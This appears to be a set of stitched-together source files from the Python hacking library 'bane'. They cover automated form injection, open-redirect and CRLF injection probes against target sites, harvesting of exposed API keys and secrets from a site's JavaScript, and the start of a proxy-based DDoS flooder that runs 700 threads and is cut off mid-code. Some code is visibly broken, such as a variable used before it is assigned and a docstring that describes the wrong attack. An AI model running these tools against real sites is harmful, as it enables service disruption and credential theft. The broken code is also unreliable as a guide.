            d.update({x.split("=")[0].strip(): x.split("=")[1].strip()})
    return d


def update_cookies(cookies, cook):
    c1 = {}
    c2 = {}
    if cookies:
        c1 = cookies_to_dict(cookies)
    if cook:
        c2 = cookies_to_dict(cook)
    c2.update(c1)
    cookie = ""
    for x in c2:
        cookie += x + "=" + c2[x] + ";"
    return cookie


def set_correct_cookies(new_cookies, cookie=None):
    if not cookie:
        cookie = ""
    if not new_cookies:
        new_cookies = ""
    if cookie and len(cookie) > 0:
        if new_cookies and len(new_cookies) > 0:
            cookies = update_cookies(new_cookies, cookie)
        else:
            cookies = cookie
    else:
        cookies = new_cookies
    return cookies


def set_up_injection(
    url,
    form_index,
    parameter,
    payload,
    cookie,
    user_agent,
    proxy,
    timeout,
    auto_fill,
    file_extension="png",
    email_extension='@gmail.com',
    phone_pattern='XXX-XXX-XXXX',
    dont_change={},
    number=(1, 9),
    leave_empty=[],
    dont_send=[],
    mime_type=None,
    predefined_inputs={},
    headers={}
):
    cookies = None
    h = {"User-Agent": user_agent}
    if cookie:
        h.update({"Cookie": cookie})
        cookies = cookie
    h.update(headers)
    
    try:
        r = requests.get(url, proxies=proxy, headers=h, verify=False, timeout=timeout)
    except:
        return False
    cook = None
    try:
        cook = r.headers["Set-cookie"]
    except:
        pass
    cookies = set_correct_cookies(cook, cookie=cookie)
    form = forms_parser_text(url, r.text)[form_index]
    h = {"User-Agent": user_agent}
    if cookies and len(cookies.strip()) > 0:
        h.update({"Cookie": cookies})
    h.update(headers)
    return (
        form_filler(
            form,
            parameter,
            payload,
            auto_fill=auto_fill,
            number=number,
            dont_change=dont_change,
            email_extension=email_extension,
            phone_pattern=phone_pattern,
            file_extension=file_extension,
            leave_empty=leave_empty,
            dont_send=dont_send,
            mime_type=mime_type,
            predefined_inputs=predefined_inputs,
        ),
        h,
        proxy,
        timeout,
    )


def form_filler(
    form,
    param,
    payload,
    file_extension="png",
    email_extension='@gmail.com',
    phone_pattern='XXX-XXX-XXXX',
    dont_change={},
    number=(1, 9),
    auto_fill=10,
    leave_empty=[],
    dont_send=[],
    mime_type=None,
    predefined_inputs={},
):
    for x in form["inputs"]:
        if x["name"].strip() in dont_change:
            x["value"] = dont_change[x["name"]]
        else:
            if x["name"].strip() in dont_send:
                form["inputs"].remove(x)
            else:
                if x["name"].strip() not in leave_empty:
                    if x["name"].strip() == param:
                        if file_extension==None:
                            file_extension=random.choice(x["accept"])
                        if x["type"] == "file":
                            if not mime_type:
                                x["value"] = (
                                    payload + "." + file_extension,
                                    files_upload[file_extension],
                                )
                            else:
                                x["value"] = (
                                    payload + "." + file_extension,
                                    files_upload[file_extension],
                                    mime_type,
                                )
                        else:
                            x["value"] = payload
                    else:
                        if x["name"].strip() in predefined_inputs:
                            x["value"] = predefined_inputs[x["name"]]
                        else:
                            if x["value"] == "":
                                if x["type"] == "file":
                                    if not mime_type:
                                        x["value"] = (
                                            "bane_test"
                                            + str(random.randint(100000, 999999))
                                            + "."
                                            + file_extension,
                                            files_upload[file_extension],
                                        )
                                    else:
                                        x["value"] = (
                                            "bane_test"
                                            + str(random.randint(100000, 999999))
                                            + "."
                                            + file_extension,
                                            files_upload[file_extension],
                                            mime_type,
                                        )
                                else:
                                    #if x['value']=='':
                                        if x["type"] == "number":
                                            x["value"] += str(random.randint(int(float(x.get('min',0))), int(float(x.get('max',9)))))
                                        elif x['type'] in ['text','password','search','textarea']:
                                            leng=random.randint(int(float(x.get('min',1))), int(float(x.get('max',64)))+1)
                                            for i in range(leng):
                                                x["value"] += random.choice(lis)
                                        elif x['type']=='email':
                                            leng=random.randint(int(float(x.get('min',1))), int(float(x.get('max',15)))-len(email_extension)+1)
                                            for i in range(leng):
                                                x["value"] += random.choice(string.ascii_lowercase)
                                            x["value"]+=email_extension
                                        elif x['type']=='tel':
                                            x["value"]=generate_random_phone_number(phone_pattern)
                                        elif x['type']=='url':
                                            x["value"]=generate_random_url()
                                        elif x['type']=='date':
                                            x["value"]=random_date(x['min'], x['max'])
                                        elif x['type']=='color':
                                            x['value']=generate_random_html_input_color()      
                            if x["type"] in ["select", "radio", "checkbox"]:
                                if len(x["value"]) == 0 or x["value"] == "":
                                    x["value"] = ""
                                    for i in range(auto_fill):
                                        x["value"] += random.choice(lis)
                                else:
                                    x["value"] = random.choice(x["value"])
    #print(form)
    return form


def get_login_form(url, text):
    a = forms_parser_text(url, text)
    for x in a:
        for i in x["inputs"]:
            if i["type"].lower().strip() == "password":
                return x
    raise Exception("No login form")


def set_login_form(url, text, username, password):
    a = get_login_form(url, text)
    d = {}
    for x in a["inputs"]:
        if x["type"].lower().strip() == "password":
            d.update({x["name"]: password})
        elif (
            x["type"].lower().strip() == "text"
            or x["type"].lower().strip() == "email"
            or x["type"].lower().strip() == "tel"
        ):
            d.update({x["name"]: username})
        else:
            d.update({x["name"]: x["value"]})
    return [d, a["action"]]


def get_upload_form(a):
    l=[]
    for x in a:
        for i in x["inputs"]:
            if i["type"].lower().strip() == "file":
                l.append(x)
    if l==[]:
        raise Exception("No file upload form")
    return l


def get_upload_form_text(url, text):
    l=[]
    a = forms_parser_text(url, text)
    for x in a:
        for i in x["inputs"]:
            if i["type"].lower().strip() == "file":
                l.append(x)
    if l==[]:
        raise Exception("No file upload form")
    return l


def crawl(
    u,
    timeout=10,
    html_comments=False,
    user_agent=None,
    bypass=False,
    proxy=None,
    cookie=None,
    headers={}
):
    """
    this function is used to crawl any given link and returns a list of all available links on that webpage with ability to bypass anti-crawlers

    the function takes those arguments:

    u: the targeted link
    timeout: (set by default to 10) timeout flag for the request
    bypass: (set by default to False) option to bypass anti-crawlers by simply adding "#" to the end of the link :)

    usage:

    >>>import bane
    >>>url='http://www.example.com'
    >>>bane.crawl(url)

    >>>bane.crawl(url,bypass=True)"""
    if urlparse(u).path == "":
        u += "/"
    if u.split("?")[0][-1] != "/" and "." not in u.split("?")[0].rsplit("/", 1)[-1]:
        u = u.replace("?", "/?")
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    h = {}
    if bypass == True:
        u += "#"
    if cookie:
        hea = {"User-Agent": us, "Cookie": cookie}
    else:
        hea = {"User-Agent": us}
    hea.update(headers)
    try:
        c = requests.get(
            u, headers=hea, proxies=proxy, timeout=timeout, verify=False
        ).text
        if html_comments == False:
            c = remove_html_comments(c)
        soup = BeautifulSoup(c, "html.parser")
        ur = u.replace(u.split("/")[-1], "")
        """if ur[-1]=='/':
   ur=ur[:-1]"""
        index_link = 0
        h.update(
            {
                -1: (
                    "Source_url",
                    u,
                    urlparse(u).path,
                    [(x, furl.furl(u).args[x]) for x in furl.furl(u).args],
                )
            }
        )
        for a in soup.find_all("a"):
            u = ur
            if a.has_attr("href"):
                try:
                    txt = a.text
                    a = str(a["href"])
                    if "://" not in a:
                        if a[0] == "/":
                            a = a[1 : len(a)]
                        a = u + a
                    if (a not in h.values()) and (u in a):
                        if (a != u + "/") and (a != u):
                            h.update(
                                {
                                    index_link: (
                                        txt,
                                        a,
                                        urlparse(a).path,
                                        [
                                            (x, furl.furl(a).args[x])
                                            for x in furl.furl(a).args
                                        ],
                                    )
                                }
                            )
                            index_link += 1
                except Exception as e:
                    pass
    except Exception as ex:
        pass
    return h


def crawl_text(u, text, html_comments=False):
    """
    this function is used to crawl any given link and returns a list of all available links on that webpage with ability to bypass anti-crawlers

    the function takes those arguments:

    u: the targeted link
    timeout: (set by default to 10) timeout flag for the request
    bypass: (set by default to False) option to bypass anti-crawlers by simply adding "#" to the end of the link :)

    usage:

    >>>import bane
    >>>url='http://www.example.com'
    >>>bane.crawl(url)

    >>>bane.crawl(url,bypass=True)"""
    if urlparse(u).path == "":
        u += "/"
    if u.split("?")[0][-1] != "/" and "." not in u.split("?")[0].rsplit("/", 1)[-1]:
        u = u.replace("?", "/?")
    h={}
    try:
        c = text
        if html_comments == False:
            c = remove_html_comments(c)
        soup = BeautifulSoup(c, "html.parser")
        ur = u.replace(u.split("/")[-1], "")
        """if ur[-1]=='/':
   ur=ur[:-1]"""
        index_link = 0
        h.update(
            {
                -1: (
                    "Source_url",
                    u,
                    urlparse(u).path,
                    [(x, furl.furl(u).args[x]) for x in furl.furl(u).args],
                )
            }
        )
        for a in soup.find_all("a"):
            u = ur
            if a.has_attr("href"):
                try:
                    txt = a.text
                    a = str(a["href"])
                    if "://" not in a:
                        if a[0] == "/":
                            a = a[1 : len(a)]
                        a = u + a
                    if (a not in h.values()) and (u in a):
                        if (a != u + "/") and (a != u):
                            h.update(
                                {
                                    index_link: (
                                        txt,
                                        a,
                                        urlparse(a).path,
                                        [
                                            (x, furl.furl(a).args[x])
                                            for x in furl.furl(a).args
                                        ],
                                    )
                                }
                            )
                            index_link += 1
                except Exception as e:
                    pass
    except Exception as ex:
        pass
    return h


def media(
    u,
    timeout=10,
    html_comments=False,
    user_agent=None,
    bypass=False,
    proxy=None,
    cookie=None,
    headers={}
):
    """
    this funtion was made to collect the social media links related to the targeted link (facebook, twitter, instagram...).

    the function takes those arguments:

    u: the targeted link
    timeout: (set by default to 10) timeout flag for the request
    bypass: (set by default to False) option to bypass anti-crawlers by simply adding "#" to the end of the link :)

    usage:

    >>>import bane
    >>>url='http://www.example.com'
    >>>bane.media(url)

    >>>bane.media(url,bypass=True)"""
    if urlparse(u).path == "":
        u += "/"
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    if cookie:
        hea = {"User-Agent": us, "Cookie": cookie}
    else:
        hea = {"User-Agent": us}
    h = {}
    try:
        if bypass == True:
            u += "#"
        hea.update(headers)
        c = requests.get(
            u, headers=hea, proxies=proxy, timeout=timeout, verify=False
        ).text
        if html_comments == False:
            c = remove_html_comments(c)
        soup = BeautifulSoup(c, "html.parser")
        ul = u.split("://")[1].split('"')[0]
        ur = ul.replace("www.", "")
        for a in soup.findAll("a"):
            try:
                if (
                    a.has_attr("href")
                    and (u not in a["href"])
                    and (ur not in a["href"])
                    and (a["href"][:4] == "http")
                ):
                    txt = a.text
                    if a["href"] not in h:
                        h.update({txt: a["href"]})
            except:
                pass
    except:
        pass
    return h


def subdomains_extract(
    u,
    timeout=10,
    html_comments=False,
    user_agent=None,
    bypass=False,
    proxy=None,
    cookie=None,
    headers={}
):
    """
    this function collects the subdomains found on the targeted webpage.

    the function takes those arguments:

    u: the targeted link
    timeout: (set by default to 10) timeout flag for the request
    bypass: (set by default to False) option to bypass anti-crawlers by simply adding "#" to the end of the link :)

    usage:

    >>>import bane
    >>>url='http://www.example.com'
    >>>bane.subdomains_extract(url)

    >>>bane.subdomains_extract(url,bypass=True)"""
    if urlparse(u).path == "":
        u += "/"
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    h = {}
    if cookie:
        hea = {"User-Agent": us, "Cookie": cookie}
    else:
        hea = {"User-Agent": us}
    hea.update(headers)
    try:
        if bypass == True:
            u += "#"
        c = requests.get(
            u, headers=hea, proxies=proxy, timeout=timeout, verify=False
        ).text
        if html_comments == False:
            c = remove_html_comments(c)
        ul = u.split("://")[1].split("/")[0]
        soup = BeautifulSoup(c, "html.parser")
        for a in soup.findAll("a"):
            if (
                a.has_attr("href")
                and (ul.replace("www", "") in a["href"])
                and (ul not in a["href"])
                and (a["href"][:4] == "http")
            ):
                txt = a.text
                try:
                    hr = a["href"].split("://")[1].split("/")[0]
                    h.update({txt: hr})
                except Exception as e:
                    pass
    except Exception as e:
        pass
    return h




def extract_urls_from_js(js_content, base_url):
    # Regular expression to match URLs in JavaScript code
    url_pattern = re.compile(r'https?://\S+|/\S+')

    # Find all matches in the JavaScript code
    matches = re.findall(url_pattern, js_content)

    # Filter out URLs that start with '/'
    extracted_urls = [match if match.startswith('http') else base_url + match for match in matches]
    urls=[]
    for x in extracted_urls:
        x=x.split('"')[0]
        x=x.split(';')[0]
        x=x.split("'")[0]
        urls.append(x)
    return urls



def fetch_url(
        u,
        user_agent=None,
        timeout=10,
        proxy=None,
        cookie=None,
        headers={}
    ):
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    if cookie:
        hea = {"User-Agent": us, "Cookie": cookie}
    else:
        hea = {"User-Agent": us}
    hea.update(headers)
    try:
        return requests.get(u,timeout=timeout,proxies=proxy,verify=False,headers=hea).text
    except:
        return ''



def extract_urls_from_js(js_content, base_url):
    # Regular expression to match URLs in JavaScript code
    url_pattern = re.compile(r'https?://\S+|/\S+')

    # Find all matches in the JavaScript code
    matches = re.findall(url_pattern, js_content)

    # Filter out URLs that start with '/'
    extracted_urls = [match if match.startswith('http') else base_url + match for match in matches]
    urls=[]
    for x in extracted_urls:
        x=x.split('"')[0]
        x=x.split(';')[0]
        x=x.split("'")[0]
        urls.append(x)
    return urls


def readable_js_code(code):
    return jsbeautifier.beautify(code)


def examine_js_code(u,
                    user_agent=None,
                    timeout=10,
                    proxy=None,
                    cookie=None,
                    headers={}
    ):
    domain=u.split('://')[1].split('/')[0]
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    if cookie:
        hea = {"User-Agent": us, "Cookie": cookie}
    else:
        hea = {"User-Agent": us}
    hea.update(headers)
    try:
        r= requests.get(u,timeout=timeout,proxies=proxy,verify=False,headers=hea).text
        soup = BeautifulSoup(r, 'html.parser')
        script_tags = soup.find_all('script')
        code=''
        for script in script_tags:
            if script.has_attr('src'):
                pass
            else:
                code+=script.get_text()
        secrets=[]
        #print(code)
        secrets.append({'url':u,'secrets':extract_secrets_from_text(code)})#,'endpoints':extract_urls_from_js(code,u)})
        for script in script_tags:
            if script.has_attr('src'):
                url=urljoin(u,script['src'])
                url_domain=url.split('://')[1].split('/')[0]
                if extract_root_domain(url_domain)==extract_root_domain(domain):
                    #print(url_domain)
                    code=fetch_url(url,user_agent=user_agent,timeout=timeout,proxy=proxy,cookie=cookie,headers=headers)
                    secrets.append({'url':url,'secrets':extract_secrets_from_text(code)})#,'endpoints':extract_urls_from_js(code,url)})

    except Exception as ex:
        pass
    return [ x for x in secrets if len(list(x['secrets'].keys()))>0]



def extract_secrets_from_text(js_content):
    tokens_dict = {}
    for key, pattern in js_exposed_secrets_regexs.items():
        #for pattern in x:
            l=[]
            try:
                if key=='firebase_config':
                    if matches:
                        for match in matches:
                            apiKey, authDomain, projectId, storageBucket, messagingSenderId, appId, measurementId, vapidKey = match
                            d={
                                        "apiKey": apiKey,
                                        "authDomain": authDomain,
                                        "projectId": projectId,
                                        "storageBucket": storageBucket,
                                        "messagingSenderId": messagingSenderId,
                                        "appId": appId,
                                        "measurementId": measurementId,
                                        "vapidKey": vapidKey
                                    }
                            l.append(d)
                        tokens_dict[key] = l
                elif key=='json_configs':
                    matches=re.findall(pattern, js_content, re.DOTALL)
                    if matches:
                        l=[]
                        for match in matches:
                            if any(item in str(match).lower() for item in json_configs_signatures)==True and match not in l:
                                l.append(match)
                        if len(l)>0:
                            tokens_dict[key] = l
                else:
                    if type(pattern)==tuple:
                        pattern=re.compile(pattern[0], re.IGNORECASE)
                    matches = re.findall(pattern, js_content)
                    if matches:
                        for x in matches:
                            if '"{}"'.format(x) in js_content or "'{}'".format(x) in js_content or "={}".format(x) in js_content or "= {}".format(x) in js_content or ":{}".format(x) in js_content or ": {}".format(x) in js_content:
                                l.append(x)
                        l=list(set(l))
                        if len(l)>0:
                            tokens_dict[key] = l
            except Exception as ex:
                pass
    return tokens_dict




def generate_human_poc(data):
    if "is_url" not in data:
        raise ValueError("The 'is_url' key is missing in the input data")

    if data["is_url"]:
        # If is_url is True, generate a URL
        url = data.get("action", "")
        if not url:
            raise ValueError("Missing 'action' key for URL generation")
        
        query_parameters = []
        for input_field in data.get("inputs", []):
            name = input_field.get("name", "")
            value = input_field.get("value", "")
            query_parameters.append("{}={}".format(name,value))
        
        if query_parameters:
            url += "?" + "&".join(query_parameters)

        return url

    else:
        # If is_url is False, generate an HTML form
        form_id = data.get("id", "")
        form_method = data.get("method", "post")
        form_action = data.get("action", "")
        form_enctype = data.get("enctype", "application/x-www-form-urlencoded")

        inputs = ""
        for input_field in data.get("inputs", []):
            name = input_field.get("name", "")
            value = input_field.get("value", "")
            input_type = input_field.get("type", "text")
            required = "required" if input_field.get("required", False) else ""
            input_element = "<input type='{}' name='{}' value='{}' {}>".format(input_type,name,value,required)
            inputs += input_element

        html_form = """
        <form id='{}' method='{}' action='{}' enctype='{}'>
            {}
        </form>
        """.format(form_id,form_method,form_action,form_enctype,inputs)
        return html_form






import os, sys


def update_py2(version=None):
    os.system("pip uninstall bane -y")
    if version:
        os.system("pip install bane==" + str(version))
    else:
        os.system("pip install bane")



def update_py3(version=None):
    os.system("pip3 uninstall bane -y")
    if version:
        os.system("pip3 install bane==" + str(version))
    else:
        os.system("pip3 install bane")
        


def update(version=None):
    if sys.version_info < (3, 0):
        update_py2(version=version)
    else:
        update_py3(version=version)



from bane.scanners.vulnerabilities.utils import *


def is_valid_open_redirect(req,payload):
    return url_decode(payload)==req.headers['location']



def open_redirect_submit(
    parsed,
    payload,
    replaceble_parameters,
    debug=False,
    enctype="application/x-www-form-urlencoded",
):
    """"""
    p_o_c=parsed[0].copy()
    d, fi = setup_to_submit(parsed[0])
    for x in d:
        for y in replaceble_parameters:
            if x == y:
                for z in replaceble_parameters[y]:
                    d[x] = d[x].replace(z[0], z[1])
    if not fi:
        parsed[1].update(
            {
                "Content-Type": enctype,
                "Referer": parsed[0]["action"],
                "Origin": parsed[0]["action"].split("://")[0]
                + "://"
                + parsed[0]["action"].split("://")[1].split("/")[0],
            }
        )
    else:
        parsed[1].update(
            {
                "Referer": parsed[0]["action"],
                "Origin": parsed[0]["action"].split("://")[0]
                + "://"
                + parsed[0]["action"].split("://")[1].split("/")[0],
            }
        )
    if debug == True:
        for x in d:
            print("{}{} : {}{}".format(Fore.MAGENTA, x, Fore.WHITE, d[x]))
        for x in fi:
            print("{}{} : {}{}".format(Fore.MAGENTA, x, Fore.WHITE, fi[x]))
    if "application/json" in enctype:
        d = json.dumps(d)
    c=''
    if parsed[0]["method"] == "get":
        try:
            c = requests.get(
                parsed[0]["action"],
                params=d,
                headers=parsed[1],
                proxies=parsed[2],
                timeout=parsed[3],
                verify=False,
                allow_redirects=False
            )
            if is_valid_open_redirect(c,payload):
                return (True, {"p_o_c":p_o_c},any(s in c for s in sql_errors),any(s in c for s in xml_parser_errors),any(s in c for s in fetch_url_errors),any(s in c for s in open_file_errors),p_o_c)
        except Exception as e:
            pass
    else:
        try:
            c = requests.post(
                parsed[0]["action"],
                data=d,
                files=fi,
                headers=parsed[1],
                proxies=parsed[2],
                timeout=parsed[3],
                verify=False,
                allow_redirects=False
            )
            if is_valid_open_redirect(c,payload)==True:
                return (True, {"p_o_c":p_o_c},any(s in c for s in sql_errors),any(s in c for s in xml_parser_errors),any(s in c for s in fetch_url_errors),any(s in c for s in open_file_errors),p_o_c)
        except Exception as e:
            pass
    return (False, "",any(s in c for s in sql_errors),any(s in c for s in xml_parser_errors),any(s in c for s in fetch_url_errors),any(s in c for s in open_file_errors),p_o_c)



def open_redirect_forms(
    u,
    payload='http://www.google.com',
    number=(1, 9),
    dont_change={},
    email_extension='@gmail.com',
    phone_pattern='XXX-XXX-XXXX',
    predefined_inputs={},
    replaceble_parameters={"phpvalue": ((".", ""),)},
    file_extension="png",
    save_to_file=None,
    logs=True,
    fill_empty=10,
    leave_empty=[],
    dont_send=["btnClear"],
    proxy=None,
    proxies=None,
    timeout=10,
    user_agent=None,
    cookie=None,
    debug=False,
    mime_type=None,
    headers={}
):
    """
    this function is for xss test with both POST and GET requests. it extracts the input fields names using the "inputs" function then test each input using POST and GET methods.

    usage:

    >>>import bane
    >>>bane.xss_forms('http://www.example.com/")

    >>>bane.xss_forms('http://www.example.com/',payload="<script>alert(123);</script>")

    """
    target_page = u
    if proxy:
        proxy = proxy
    if proxies:
        proxy = random.choice(proxies)
    dic = []
    pre_apyload = True
    if logs == True:
        print(Fore.WHITE + "[~]Getting forms..." + Style.RESET_ALL)
    hu = True
    fom = forms_parser(
        u, proxy=proxy, timeout=timeout, cookie=cookie, user_agent=user_agent,include_links=True,headers=headers
    )
    if len(fom) == 0:
        if logs == True:
            print(Fore.RED + "[-]No forms were found!!!" + Style.RESET_ALL)
        hu = False
    if hu == True:
        form_index = -1
        for l1 in fom:
            form_index += 1
            xp=payload
            lst = {}
            vul = []
            sec = []
            sql_e=[]
            xml_e=[]
            p_t_e=[]
            ssrf_e=[]
            p_t_erros=[]
            ssrf_errors=[]
            hu = True
            u = l1["action"]
            if logs == True:
                print(
                    Fore.BLUE
                    + "Form: "
                    + Fore.WHITE
                    + str(form_index)
                    + Fore.BLUE
                    + "\nAction: "
                    + Fore.WHITE
                    + u
                    + Fore.BLUE
                    + "\nMethod: "
                    + Fore.WHITE
                    + l1["method"]
                    + Fore.BLUE
                    + "\nPayload: "
                    + Fore.WHITE
                    + xp
                    + Style.RESET_ALL
                )
            """if len(inputs(u,proxy=proxy,timeout=timeout,value=True,cookie=cookie,user_agent=user_agent))==0:
     hu=False
     if logs==True:
      print(Fore.YELLOW+"[-]No parameters found on that page !! Moving on.."+Style.RESET_ALL)"""
            if True:
                extr = []
                l = []
                for x in l1["inputs"]:
                    if (
                        x["name"].strip() not in leave_empty
                        and x["name"].strip() not in dont_send
                    ):
                        if (
                            x["type"]
                            in [
                                "hidden",
                                "file",
                                "text",
                                "textarea",
                                "email",
                                "tel",
                                "search",
                                "url",
                                "password",
                                "number",
                                "select",
                                "radio",
                                "checkbox",
                                "color"
                            ]
                            and x["name"] not in dont_change
                        ):  # any input type that accept direct input from keyboard
                            i = x["name"]
                            parsed_form = set_up_injection(
                                target_page,
                                form_index,
                                i,
                                xp,
                                cookie,
                                setup_ua(user_agent),
                                setup_proxy(proxy, proxies),
                                timeout,
                                fill_empty,
                                file_extension=file_extension,
                                dont_change=dont_change,
                                email_extension=email_extension,
                                phone_pattern=phone_pattern,
                                number=number,
                                leave_empty=leave_empty,
                                dont_send=dont_send,
                                mime_type=mime_type,
                                predefined_inputs=predefined_inputs,
                                headers=headers
                            )
                            xss_res = open_redirect_submit(
                                parsed_form,
                                xp,
                                replaceble_parameters,
                                debug=debug,
                                enctype=l1["enctype"],
                            )
                            if xss_res[0] == True:
                                x = "parameter: '" + i + "' => [+]Open redirect detected"
                                vul.append({'parameter':i, 'context':xss_res[1]})
                                colr = Fore.GREEN
                            else:
                                x = "parameter: '" + i + "' => [-]Failed"
                                #sec.append(i)
                                colr = Fore.RED
                            if xss_res[2] == True:
                                x+=Fore.YELLOW+"\n[i] SQL Error detected"
                                sql_e.append({'parameter':i, 'p_o_c': xss_res[-1]})
                            if xss_res[3]==True:
                                x+=Fore.YELLOW+"\n[i] XML parsing Error detected"
                                xml_e.append({'parameter':i, 'p_o_c': xss_res[-1]})
                            if xss_res[4] == True:
                                x+=Fore.YELLOW+"\n[i] Fetching URL Error detected (potential SSRF)"
                                ssrf_e.append({'parameter':i, 'p_o_c': xss_res[-1]})
                            if xss_res[5] == True:
                                x+=Fore.YELLOW+"\n[i] Reading file Error detected (potential path traversal)"
                                p_t_e.append({'parameter':i, 'p_o_c': xss_res[-1]})
                            if logs == True:
                                print(colr + x + Style.RESET_ALL)
            dic.append(
                {
                    "form": u,
                    "method": l1["method"],
                    "vulnerable": vul,
                    #"safe": sec,
                    "sql_errors":sql_e,
                    "xml_parsing_errors":xml_e,
                    "fetching_url_errors":ssrf_e,
                    "reading_file_errors":p_t_e
                }
            )
        if save_to_file:
            with open(save_to_file.split(".")[0] + ".json", "w") as outfile:
                json.dump(
                    {"payload": xp, "page": target_page, "result": dic},
                    outfile,
                    indent=4,
                )
            outfile.close()
        return {"payload": xp, "page": target_page, "result": dic}




def open_redirect(
    u,
    max_pages=5,
    pages=[],
    payload='http://www.google.com',
    number=(1, 9),
    email_extension='@gmail.com',
    phone_pattern='XXX-XXX-XXXX',
    js_function="alert",
    dont_change={},
    predefined_inputs={},
    replaceble_parameters={"phpvalue": ((".", ""),)},
    file_extension="png",
    context_breaker='">',
    save_to_file=None,
    logs=True,
    fill_empty=10,
    leave_empty=[],
    dont_send=["btnClear"],
    proxy=None,
    proxies=None,
    timeout=10,
    user_agent=None,
    cookie=None,
    debug=False,
    mime_type=None,
    headers={}
):
    l=[]
    if pages==[]:
        pages=spider_url(u,cookie=cookie,max_pages=max_pages,timeout=timeout,user_agent=user_agent,proxy=proxy,headers=headers)
    for x in pages:
        if logs==True:
            print('\n\nPage: {}\n'.format(x))
        l.append(open_redirect_forms(x,
                           payload=payload,
                            number=number,
                            dont_change=dont_change,
                            predefined_inputs=predefined_inputs,
                            replaceble_parameters=replaceble_parameters,
                            file_extension=file_extension,
                            save_to_file=save_to_file,
                            email_extension=email_extension,
                            phone_pattern=phone_pattern,
                            logs=logs,
                            fill_empty=fill_empty,
                            leave_empty=leave_empty,
                            dont_send=dont_send,
                            proxy=proxy,
                            proxies=proxies,
                            timeout=timeout,
                            user_agent=user_agent,
                            cookie=cookie,
                            debug=debug,
                            mime_type=mime_type,
                            headers=headers))
    f=[]
    for x in l:
        if x !=None:
            n=x.copy()
            n['result']=[]
            for i in x['result']:
                if len(i['vulnerable']) > 0 or len(i['sql_errors']) > 0 or len(i['xml_parsing_errors'])>0 or len(i['fetching_url_errors'])>0 or len(i['reading_file_errors']) > 0:
                    n['result'].append(i)
            if n['result']!=[]:
                f.append(n)
    return f





import os

def clear_file(w):
    with open(w, "w") as f:
        pass
    f.close()



def delete_file(w):
    if os.path.exists(w):
        os.remove(w)


def write_file(w, fi, encode="utf-8"):
    with open(fi, "a+", encoding=encode) as f:
        f.write(w + "\n")
    f.close()


def read_file(w):
    with open(w, "r") as f:
        l = f.readlines()
    f.close()
    return l


def create_file(w):
    direc, file = os.path.split(w)
    try:
        if not os.path.exists(direc):
            os.makedirs(direc)
    except:
        pass
    with open(w, "w") as f:
        pass
    f.close()




#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
try:
    if sys.version_info < (3, 0):
        from scapy.all import *
    else:
        from kamene.all import *
except:
    pass
import random
import socket
import requests


def get_public_dns(timeout=10):
    try:
        return requests.get('https://public-dns.info/nameservers.txt',
                            timeout=timeout).text.split('\n')
    except:
        return []




from bane.scanners.vulnerabilities.utils import *


def set_requests(
    u, method="GET", data={}, files={}, params={}, headers={}, proxy={}, timeout=15
):
    s = requests.Session()
    req = requests.Request(
        method=method, url=u, headers=headers, data=data, files=files, params=params
    )
    prep = req.prepare()
    prep.url = u
    return s.send(prep, verify=False, proxies=proxy, timeout=timeout)


def crlf_unicode_encode(
    random_level=0, line_feed_only=False, carriage_return_only=False
):
    if line_feed_only == False and carriage_return_only == False:
        if random_level == 1:
            return random.choice(["%E5%98%8D", "%0d"]) + random.choice(
                ["%E5%98%8A", "%0a"]
            )
        if random_level == 2:
            return "%E5%98%8D%E5%98%8A"
        else:
            return "%0d%0a"
    else:
        if line_feed_only == True and carriage_return_only == False:
            if random_level == 1:
                return random.choice(["%E5%98%8A", "%0a"])
            if random_level == 2:
                return "%E5%98%8A"
            else:
                return "%0a"
        if carriage_return_only == True and line_feed_only == False:
            if random_level == 1:
                return random.choice(["%E5%98%8D", "%0d"])
            if random_level == 2:
                return "%E5%98%8D"
            else:
                return "%0d"
    return "%0d%0a"


def crlf_header_injection(
    u,
    unicode_random_level=0,
    carriage_return_only=False,
    line_feed_only=False,
    proxy=None,
    timeout=10,
    user_agent=None,
    cookie=None,
    debug=False,
    headers={}
):
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    if cookie:
        heads = {"User-Agent": us, "Cookie": cookie}
    else:
        heads = {"User-Agent": us}
    heads.update(headers)
    try:
        r = set_requests(
            u
            + crlf_unicode_encode(
                random_level=unicode_random_level,
                carriage_return_only=carriage_return_only,
            )
            + "banetest:%20test",
            method="GET",
            headers=heads,
            proxy=proxy,
            timeout=timeout,
            verify=False,
        )
        return "banetest" in r.headers
    except Exception as e:
        pass
    return False


def crlf_body_injection(
    u,
    proxy=None,
    unicode_random_level=0,
    carriage_return_only=False,
    line_feed_only=False,
    timeout=10,
    user_agent=None,
    cookie=None,
    debug=False,
    headers={}
):
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    if cookie:
        heads = {"User-Agent": us, "Cookie": cookie}
    else:
        heads = {"User-Agent": us}
    heads.update(headers)
    try:
        r = set_requests(
            u
            + crlf_unicode_encode(
                random_level=unicode_random_level,
                carriage_return_only=carriage_return_only,
            )
            + crlf_unicode_encode(
                random_level=unicode_random_level,
                carriage_return_only=carriage_return_only,
            )
            + "banetest:%20test",
            method="GET",
            headers=heads,
            proxy=proxy,
            timeout=timeout,
            verify=False,
        )
        return "banetest;$@*" in r.text
    except Exception as e:
        pass
    return False




from bane.ddos.utils import *

class prox_hammer(DDoS_Class):
    def __init__(
        self,
        u,
        p=80,
        cookie=None,
        user_agents=None,
        threads_daemon=True,
        scraping_timeout=15,
        max_content=15000,
        min_content=10000,
        threads=700,
        timeout=5,
        http_list=None,
        socks4_list=None,
        socks5_list=None,
        duration=60,
        logs=True,
    ):
        self.cookie = cookie
        self.user_agents = user_agents
        if not self.user_agents or len(self.user_agents) == 0:
            self.user_agents = ua
        self.httplist = http_list
        if not self.httplist and self.httplist != []:
            self.httplist = proxyscrape(timeout=scraping_timeout)
        self.socks4list = socks4_list
        if not self.socks4list and self.socks4list != []:
            self.socks4list = proxyscrape(protocol='socks4',timeout=scraping_timeout)
        self.socks5list = socks5_list
        if not self.socks5list and self.socks5list != []:
            self.socks5list = proxyscrape(protocol='socks5',timeout=scraping_timeout)
        self.stop = False
        self.start = time.time()
        self.target = u
        self.duration = duration
        self.port = p
        self.timeout = timeout
        self.max_content = max_content
        self.min_content = min_content
        self.logs = logs
        self.counter = 0
        for x in range(threads):
            try:
                t = threading.Thread(target=self.attack)
